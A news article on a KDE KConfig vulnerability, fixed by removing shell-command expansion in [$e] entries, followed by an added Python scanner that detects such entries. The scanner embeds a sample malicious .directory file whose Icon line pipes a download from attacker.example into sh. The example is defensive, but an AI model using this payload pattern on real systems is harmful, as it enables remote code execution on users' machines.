A code execution vulnerability in the KDE desktop environment has been fixed by removing support for shell commands in the KConfig configuration system.
Earlier this week, BleepingComputer reported on a zero-day code execution vulnerability in the KDE desktop environment that could allow a remote attacker to execute commands on a user's machine by tricking them into extracting an archive and opening its folder.
The vulnerability was caused by .desktop and .directory files supporting shell commands to dynamically assign a value to various KConfig entries, such as the Icon field. A KConfig entry whose key carries the [$e] marker has its value expanded when the file is read, and that expansion included running $(command) and substituting its output. An attacker could therefore create malicious .desktop or .directory files that execute code as soon as the containing folder is opened in a KDE file manager, as demonstrated in a test by BleepingComputer.
To fix this vulnerability, the KDE Project has decided to remove support for shell commands in KConfig entries, while continuing to allow environment variable expansion. The project's advisory states:
After careful consideration, the entire feature of supporting shell commands in KConfig entries has been removed, because we could not find an actual use case for it. If you do have an existing use for the feature, please contact us so that we can evaluate whether it would be possible to provide a secure solution.
Note that [$e] remains useful for environment variable expansion.
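The following Python script is an added example, not code from the article or from the KDE Project. It shows what a malicious .directory file of the kind described above looks like, parses KConfig-style entries, flags any [$e]-marked entry whose value contains the $(command) shell-expansion form that the fix removed, and models a hardened expander that substitutes only environment variables. The sample file contents and the host name attacker.example are constructed for illustration; the function names and the assumption that a hardened expander leaves $(...) as literal text are the example's own, not a description of KConfig's actual implementation.

```python
import os
import re

# Constructed sample .directory file modelled on the pattern in the article:
# the Icon key is marked [$e], so its value is expanded, and the value runs
# a shell command via $(...). The Comment entry only uses $USER and is benign.
SAMPLE_DIRECTORY = """[Desktop Entry]
Type=Directory
Name=Holiday Photos
Icon[$e]=$(curl -s http://attacker.example/payload.sh | sh; echo folder)
Comment[$e]=Owned by $USER
"""

# key, optional [marker] suffixes (locale or $e), '=', value
ENTRY_RE = re.compile(r"^([^=\[\]]+)(\[[^\]]*\])*=(.*)$")
MARKER_RE = re.compile(r"\[([^\]]*)\]")
SHELL_RE = re.compile(r"\$\(")            # $(command): the removed shell form
ENV_RE = re.compile(r"\$\{(\w+)\}|\$(\w+)")  # ${VAR} or $VAR: still supported


def parse_kconfig(text):
    """Parse KConfig/INI text into {group: [(key, markers, value), ...]}."""
    groups = {}
    group = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
            groups.setdefault(group, [])
            continue
        m = ENTRY_RE.match(line)
        if not m or group is None:
            continue
        key = m.group(1)
        markers = MARKER_RE.findall(line[len(key):line.index("=")])
        groups[group].append((key, markers, m.group(3)))
    return groups


def find_shell_entries(text):
    """Return (group, key, value) for entries that would have run a command."""
    hits = []
    for group, entries in parse_kconfig(text).items():
        for key, markers, value in entries:
            if "$e" in markers and SHELL_RE.search(value):
                hits.append((group, key, value))
    return hits


def expand_env_only(value, env):
    """Hardened expansion: substitute $VAR / ${VAR} from env, leave $(...) alone.

    This models the post-fix behaviour of keeping environment variable
    expansion while refusing shell commands; it is an assumption for the
    example, not KConfig's code. Unknown variables are left as written.
    """
    def sub(m):
        name = m.group(1) or m.group(2)
        return env.get(name, m.group(0))
    return ENV_RE.sub(sub, value)


def scan_path(root):
    """Walk root and report flagged entries in every .desktop/.directory file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name != ".directory" and not name.endswith(".desktop"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for group, key, value in find_shell_entries(text):
                findings.append((path, group, key, value))
    return findings


if __name__ == "__main__":
    for group, key, value in find_shell_entries(SAMPLE_DIRECTORY):
        print(f"shell command in [{group}] {key}[$e]: {value}")
    print(expand_env_only("Owned by $USER", {"USER": "alice"}))
```

Running `scan_path` over an extracted archive before opening it in a file manager gives a quick check for the specific trigger; on patched systems the `$(` form is inert, but finding it in a downloaded archive is still a strong signal of malicious intent.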
It is strongly advised that all KDE users install these updates.